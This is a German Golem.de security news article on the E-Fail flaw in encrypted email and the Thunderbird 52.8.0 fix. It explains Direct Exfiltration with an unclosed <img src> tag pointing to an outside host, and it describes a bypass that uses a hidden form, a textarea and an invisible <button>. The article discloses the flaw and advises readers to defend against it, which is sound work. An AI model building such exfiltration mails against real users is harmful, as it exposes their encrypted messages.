Abo
  • IT-Karriere:

PGP/SMIME: Thunderbird-Update notwendig, um E-Fail zu verhindern

Thunderbird war bis Freitag für die E-Fail-Sicherheitslücke verwundbar, für Apple Mail gibt es bislang überhaupt kein Update. Vorläufig ist es empfehlenswert, HTML-Mails komplett zu deaktivieren.

Eine Exklusivmeldung von Hanno Böck veröffentlicht am
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen.
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen. (Bild: efail/CC0 1.0)

Nutzer des Thunderbird-Mailprogramms, die Mailverschlüsselung benutzen, sollten dringend das Update auf Version 52.8.0 installieren. Neben weiteren Sicherheitslücken werden darin verschiedene Bugs behoben, die es Angreifern ermöglichen, verschlüsselte Nachrichten zu exfiltrieren. Nach wie vor kein Update gibt es für Apple Mail, das ähnlich wie Thunderbird von der gravierendsten Variante der E-Fail-Sicherheitslücke betroffen ist.

Stellenmarkt
  1. Universitätsklinikum Augsburg, Augsburg
  2. DI Deutsche Immobilien Gruppe (DI-Gruppe), Düren

Am Montag hatten Sicherheitsforscher zahlreiche Sicherheitsprobleme bei verschlüsselten Mails publiziert. Ein Entwickler von Enigmail hatte zwischenzeitlich behauptet, dass es überhaupt keinen Grund zur Sorge gäbe: Wer die aktuelle Version installiert habe, sei sicher. Doch das stimmte nicht. Zwar hatte Enigmail Gegenmaßnahmen implementiert, die waren jedoch relativ leicht zu umgehen.

Direct Exfiltration nutzt mehrere Mailparts

Die gravierendste Variante der E-Fail-Lücke ist die sogenannte Direct Exfiltration. Dabei nutzt ein Angreifer die Tatsache aus, dass HTML-Mails mit mehreren Teilen im Mailprogramm gemeinsam gerendert werden. In der simpelsten Variante kann ein Angreifer somit etwa ein Bild von seinem eigenen Server laden und dabei den HTML-Tag nicht schließen (etwa <img src="https://efail.de/x=). Anschließend fügt er den verschlüsselten Mailinhalt ein. Dieser wird dann direkt als Parameter angehängt.

Diese Variante funktioniert aber nur, wenn das Nachladen von Inhalten bei HTML-Mails aktiviert ist. Bei Thunderbird ist es das in der Standardeinstellung nicht. Weiterhin hatten die Entwickler von Enigmail zwischen den Mailparts Anführungszeichen eingefügt. Damit wurde das Anhängen als Parameter unterbrochen.

Mit Formularen lassen sich Gegenmaßnahmen von Enigmail austricksen

Gemeinsam mit Jens Müller, einem der Co-Autoren des E-Fail-Papers, gelang es dem Autor dieses Artikels jedoch, trotz dieser beiden Hürden Mailinhalte zu exfiltrieren. Statt dem Nachladen eines Bildes kann man auch ein Formular verwenden. In dieses Formular fügt man eine Textarea ein. Der Vorteil: Bei einem <textarea>-Tag wird der Inhalt nicht von Anführungszeichen eingeschlossen, sondern von HTML-Tags.

Thunderbird versuchte bereits bisher, das Abschicken eines Formulars in einer HTML-Mail zu verhindern. Bei einem Klick auf einen normalen HTML-Submit-Button (<input type="submit">) wird zwar die Ziel-URL geladen, es werden jedoch keine Daten übertragen. Doch diese Schutzmaßnahme von Thunderbird war unvollständig: Neben dem <input>-Tag kann man einen Formularbutton auch mit dem <button>-Element einfügen. Und da griff die Schutzmaßnahme bislang nicht.

Somit kann ein Angreifer Folgendes machen: Er erzeugt eine Mail, die ein Formular enthält. Im Formular gibt es ein Textarea-Feld, das den verschlüsselten Teil, der exfiltriert werden soll, einschließt. Weiterhin fügt der Angreifer mit dem <button>-Element einen Button ein.

Um das Ganze möglichst unauffällig zu machen, kann man das Textarea-Feld und den Button mittels CSS unsichtbar machen. Weiterhin kann man den Button über die gesamte Mail legen. Das hat zur Folge, dass ein beliebiger Mausklick irgendwo in der dargestellten Mail dazu führt, dass die Daten an den Angreifer geschickt werden.

In der jetzt veröffentlichten Thunderbird-Version ist das Abschicken von Formularen mittels des <button>-Tags nicht mehr möglich. Damit wird der Angriff in dieser Form verhindert.

Weitere Lücken denkbar

Nach wie vor stellt Thunderbird mehrere Mailteile in einem HTML-Kontext dar. Das soll erst in einer kommenden Version behoben werden. Daher ist es gut möglich, dass weitere Tricks gefunden werden, mit denen man Mailinhalte exfiltrieren kann. Es empfielt sich daher, die Darstellung von HTML-Mails generell abzuschalten.

Apple Mail ist laut Aussage der E-Fail-Entdecker weiterhin vollständig für die Direct-Exfiltration-Lücke verwundbar. Wir haben Apple um eine Stellungnahme gebeten, bisher aber keine Antwort erhalten.

Nach der Veröffentlichung von E-Fail kam es zu heftigen Diskussionen über die Art der Veröffentlichung und insbesondere über die Warnungen der Electronic Frontier Foundation. Ein entscheidender Aspekt wurde dabei bislang wenig beachtet: Trotz monatelanger Vorwarnzeit waren wichtige Softwareprojekte nicht in der Lage, rechtzeitig Sicherheitsupdates bereitzustellen.

Zu den Kommentaren springen
Meistgelesen
  1. Astrobiologie
    Woher kommen das Leben, das Universum und der ganze Rest?
  2. Wikileaks
    Assange kommt nicht frei
  3. iPhone
    PIN-Sperre in iOS 13 umgangen
  4. Saudi-Arabien
    Drohnenangriffe legen halbe Erdölproduktion lahm
  5. Apple
    Microsoft Office auf neuem iPad nicht mehr kostenlos nutzbar
Anzeige
Top-Angebote
  2. 189€
  3. 319€/429€
  4. (u. a. HP Omen X 25 240-Hz-Monitor für 479€ und Apple iPhone 6s Plus 32 GB für 319€ und 128...
Kommentarübersicht
Re: Panikmache!
navtis 22. Mai 2018

Ist es, wenn man feststellt, dass die mail nicht signiert war, nicht längst zu spät?

Re: Ein paar kleine Anmerkungen.
Sharra 22. Mai 2018

Auch in "deiner Welt" kann man updates automatisieren... Was hier und da auch durchaus...

Re: Da bewahrheitet es sich wieder: Open Source...
throgh 20. Mai 2018

Und? Wie lange hat es jetzt gedauert bis erste Korrekturen vorgelegen haben? Ja, Open...

Folgen Sie uns
       
Transparenter OLED-Screen von Panasonic angesehen (Ifa 2019)

Der transparente OLED-Fernseher von Panasonic rückt immer näher. Auf der Ifa 2019 steht ein Prototyp, der schon jetzt Einrichtungsideen in den Kopf ruft.

Transparenter OLED-Screen von Panasonic angesehen (Ifa 2019) Video aufrufen
IMHO
IMHO: Porsche prescht beim Preis übers Ziel hinaus
IMHO
Porsche prescht beim Preis übers Ziel hinaus

Die technischen Werte der beiden elektrischen Porsche Taycan-Versionen sind beeindruckend. Viele werden sie als "Tesla-Killer" bezeichnen. Doch preislich peilt Porsche damit eine extrem kleine Zielgruppe an: Ein gut ausgestatteter Turbo S kostet 214.000 Euro.
Ein IMHO von Dirk Kunde

  1. Gaming Konsolenkrieg statt Spielestreaming
  2. IMHO Valve, so geht es nicht weiter!
  3. Onlinehandel Tesla schlägt Kaufinteressenten die Ladentür vor der Nase zu
Logitech
MX Series im Hands on: Logitechs edle Eingabegeräte
MX Series im Hands on
Logitechs edle Eingabegeräte

Beleuchtet, tolles Tippgefühl und kabellos, dazu eine Maus mit magnetischem Schweizer Präzisionsrad: Logitech hat neue Eingabegeräte für seine Premium-Reihe veröffentlicht - beide unterstützen USB Typ C. Golem.de konnte MX Keys und MX Master 3 unter Windows und MacOS bereits ausprobieren.
Ein Hands on von Peter Steinlechner

  1. Unifying Sicherheitsupdate für Logitech-Tastaturen umgangen
  2. Gaming Logitech bringt mechanische Tastaturen mit flachen Schaltern
  3. Logitacker Kabellose Logitech-Tastaturen leicht zu hacken
Tracking
Manipulierte Zustimmung: Datenschützer halten die meisten Cookie-Banner für illegal
Manipulierte Zustimmung
Datenschützer halten die meisten Cookie-Banner für illegal

Nur die wenigsten Cookie-Banner entsprechen den Vorschriften der DSGVO, wie eine Studie feststellt. Die Datenschutzbehörden halten sich mit Sanktionen aber noch zurück.
Ein Bericht von Christiane Schulzki-Haddouti

  1. Chrome & Privacy Google möchte uns in Zukunft anders tracken
  2. Tracking Google und Facebook tracken auch auf vielen Pornoseiten
  3. Android Apps kommen auch ohne Berechtigung an Trackingdaten
  1. Themen
  2. A
  3. B
  4. C
  5. D
  6. E
  7. F
  8. G
  9. H
  10. I
  11. J
  12. K
  13. L
  14. M
  15. N
  16. O
  17. P
  18. Q
  19. R
  20. S
  21. T
  22. U
  23. V
  24. W
  25. X
  26. Y
  27. Z
  28. #
 
 
    •  /